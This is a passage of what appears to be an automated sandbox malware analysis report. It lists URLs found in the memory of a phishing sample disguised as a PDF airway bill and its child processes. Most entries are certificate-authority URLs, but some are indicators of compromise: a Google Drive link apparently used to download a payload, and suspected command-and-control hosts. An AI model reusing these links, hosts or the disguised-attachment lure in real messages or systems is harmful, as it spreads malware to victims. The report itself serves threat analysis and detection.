00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.00000000006C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2168688246.000000007EC8A000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.00000000208A0000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2168238016.0000000021EE1000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000002.2522133724.00000000208A6000.00000004.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.3369025968.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.3372194719.0000000004B9C000.00000004.10000000.00040000.00000000.sdmp, WQzLddwiZR.exe, 00000015.00000000.2753377461.000000000276C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3085974166.00000000193FC000.00000004.80000000.00040000.00000000.sdmp, hdcleziT.pif.0.drString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.0000000021741000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.000000002179E000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.00000000006C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.0000000021741000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.000000002179E000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.00000000006C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.0000000021741000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.000000002179E000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.00000000006C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.0000000021741000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.000000002179E000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.00000000006C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.0000000021741000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.000000002179E000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.00000000006C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.0000000021741000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.000000002179E000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.00000000006C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.0000000021741000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.000000002179E000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.00000000006C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                      Source: firefox.exe, 00000017.00000002.3085974166.0000000019B08000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://marposet.shop/
                      Source: proquota.exe, 00000012.00000002.3372194719.00000000055CC000.00000004.10000000.00040000.00000000.sdmp, WQzLddwiZR.exe, 00000015.00000002.3371539991.000000000319C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://missvet.net/htux/?yt=LNd8mbFxBhGLQV&TB1lE=Q5GQh2pDxKbycOBSxf5jPMYccS9RI9gVCLS1zMNZ/AR9Q5msL9G
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.0000000021741000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.000000002179E000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.00000000006C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2168688246.000000007EC8A000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.00000000208A0000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2168238016.0000000021EE1000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000002.2522133724.00000000208A6000.00000004.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.3369025968.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.3372194719.0000000004B9C000.00000004.10000000.00040000.00000000.sdmp, WQzLddwiZR.exe, 00000015.00000000.2753377461.000000000276C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3085974166.00000000193FC000.00000004.80000000.00040000.00000000.sdmp, hdcleziT.pif.0.drString found in binary or memory: http://ocsp.comodoca.com0$
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.0000000021741000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.000000002179E000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.00000000006C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.0000000021741000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.000000002179E000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.00000000006C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.0000000021741000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.000000002179E000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.00000000006C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.0000000021741000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.000000002179E000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.00000000006C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.0000000021741000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.000000002179E000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.00000000006C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                      Source: WQzLddwiZR.exe, 00000015.00000002.3370132243.000000000096B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.missvet.net
                      Source: WQzLddwiZR.exe, 00000015.00000002.3370132243.000000000096B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.missvet.net/htux/
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2168688246.000000007EC8A000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2228426498.0000000021F8B000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.00000000208A0000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2168238016.0000000021EE1000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000002.2522133724.00000000208A6000.00000004.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.3369025968.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.3372194719.0000000004B9C000.00000004.10000000.00040000.00000000.sdmp, WQzLddwiZR.exe, 00000015.00000000.2753377461.000000000276C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3085974166.00000000193FC000.00000004.80000000.00040000.00000000.sdmp, hdcleziT.pif.0.drString found in binary or memory: http://www.pmail.com0
                      Source: proquota.exe, 00000012.00000002.3374453321.00000000076A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: proquota.exe, 00000012.00000002.3374453321.00000000076A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: proquota.exe, 00000012.00000002.3374453321.00000000076A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: proquota.exe, 00000012.00000002.3374453321.00000000076A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2170331076.000000000071B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002090D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?expo
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.00000000208A0000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.00000000208E4000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2170331076.00000000006FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1DIFF5eqwVA8IoDMW5L-uJvPMuo0Aiqk1
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2170331076.000000000071B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1DIFF5eqwVA8IoDMW5L-uJvPMuo0Aiqk145987165927
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2170331076.00000000006FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1DIFF5eqwVA8IoDMW5L-uJvPMuo0Aiqk1sqV
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2170331076.0000000000787000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
